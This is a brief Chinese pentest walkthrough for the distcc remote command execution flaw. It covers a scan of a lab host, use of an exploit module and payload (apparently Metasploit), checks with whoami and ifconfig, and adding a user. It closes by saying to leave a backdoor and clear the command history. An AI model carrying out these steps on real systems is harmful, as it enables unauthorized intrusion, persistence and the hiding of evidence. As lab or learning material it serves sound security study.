Distcc 用于将大规模的代码放到网络服务器上的分布式编译,如果配置不严格,容易被滥用执行命令,即攻击者可以利用分布式的编译任务执行自己想要执行的命令。该漏洞是 XCode 1.5 版本及其他版本的 distcc 2.x 版本配署版本配署对于服务器端口的访问不限制造成的。
distcc模块的详细说明:https://wiki.archlinux.org/index.php/Distcc_(%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87
1.对目标机信息搜集
nmap -sV 192.168.122.102
2.search distcc模块
3.use exploit
4.set payload
5.验证渗透是否成功
whoami
hostname
ifconfig
useradd -U XXX -P XXX
得到主机控制权后留下后门并消除历史记录 在攻击机上验证是否成功